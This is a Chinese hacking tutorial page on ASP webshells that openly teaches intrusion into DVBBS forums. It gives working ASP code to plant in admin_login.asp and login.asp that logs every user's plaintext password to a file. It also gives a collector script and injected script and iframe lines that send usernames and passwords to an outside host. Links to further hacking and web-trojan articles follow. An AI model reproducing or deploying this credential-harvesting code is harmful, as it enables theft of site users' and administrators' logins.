菜鸟是如何变成ASP木马高手的！_企业安全

　wscript.sleep 1000

　　wshshell.sendkeys"^v"

　　wshshell.sendkeys i

　　wshshell.sendkeys "%s"

　　next

　　8．搜索：程序制作：万鹏有免费申请空间的，直接上传asp马即可

　　9. 名称：全面找出你站上的asp木马

　　（1）用杀毒软件

　　（2）用ftp客户端软件，点"工具"->"比较文件夹"

　　（3）用asplist2.0.asp上传到站点空间查看，一般功能多的asp我估计就是asp木马

　　（4）用工具beyond compare

　　10名称：拓展思路拿dvbbs帐号 "一个人的圣经"的动画

　　（1）以前获得webshell后想进入dvbbs的后台,想要管理员的密码，可以这样

　　老办法:

　　修改admin_login.asp得到明文dvbbs后台密码

　　在"username=trim(replace(request("username")这行后面

　　dim fsoobject

　　dim tsobject

　　set fsoobject = server.createobject("scripting.filesystemobject")

　　set tsobject = fsoobject.createtextfile(server.mappath("laner.txt"))

　　tsobject.write cstr(request("password"))

　　set fsoobject = nothing

　　set tsobject = nothing

　　只要管理员登陆后台，在目录下就生成了laner.txt

　　（2）login.asp中case "login_chk"下:

　　on error resume next

　　dim rain

　　set rain=server.createobject("adodb.stream")

　　rain.type=2

　　rain.charset="gb2312"

　　rain.position=rain.size

　　rain.open

　　rain.loadfromfile server.mappath("laner.asp")

　　rain.writetext now&request("username")&"text:"&request("password")&chr(10)

　　rain.savetofile server.mappath("laner.asp"),2

　　rain.close

　　set rain=nothing

　　这样laner.asp将获得全部登陆人的登陆时间，用户名和密码

　　（3）如果你有自己的网站或者另外的webshell(强烈建议使用):

　　可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:

　　<%if request("n")<>"" and request("p")<>"" then

　　on error resume next

　　dim rain

　　set rain=server.createobject("adodb.stream")

　　rain.type=2

　　rain.charset="gb2312"

　　rain.position=rain.size

　　rain.open

　　rain.loadfromfile server.mappath("laner.asp")

　　rain.writetext now&"name:"&request("n")&"password:"&request("p")&chr(10)

　　rain.savetofile server.mappath("laner.asp"),2

　　rain.close

　　set rain=nothing

　　end if%>

　　11. 名称：利用qq在线状态抓鸽子肉鸡

　　生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句:

　　response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></script>"response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></iframe>"

　　结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里

个人主机入侵网络攻击的步骤

个人主机入侵网络攻击的步骤　　个人主机入侵网络攻击的步骤　　第一步：隐藏自已的位置　　为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老... [阅读全文]

秒杀Google浏览器

秒杀Google浏览器用Google浏览器浏览此篇文章，并点击下面的字符：　　EVIL:% 　　是不是很爽，^_^。... 09-06-09 [阅读全文]

黑客经常使用工具集合

黑客经常使用工具集合　　webadv：针对iis+sp3的溢出成功率很高(溢出后system权限!) 　　ipscan：大范围网段快速ipc猜解　　svc：... [阅读全文]

黑客快速入门

黑客快速入门今天的内容是获得主机的信息。我们要黑一台主机，首先要了解它的信息，　　包括它的类型，用户列表，目录，端口，漏洞等等。　　首先我们我们要找一台... [阅读全文]

网页挂马方法和技巧大汇总

网页挂马方法和技巧大汇总1，挂马的N种方法　　(1) HTML挂马法。　　常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<ifra... [阅读全文]

有史以来最牛的服务器反黑全集

有史以来最牛的服务器反黑全集　Win2k的缺省安装很容易被攻击者取得帐号列表，即使安装了最新的Service ack也是如此。　　方案一　　1.打... [阅读全文]


验证码：

验证码：

菜鸟是如何变成ASP木马高手的！

2009年06月09日 • 企业安全 •我要评论

相关文章:

发表评论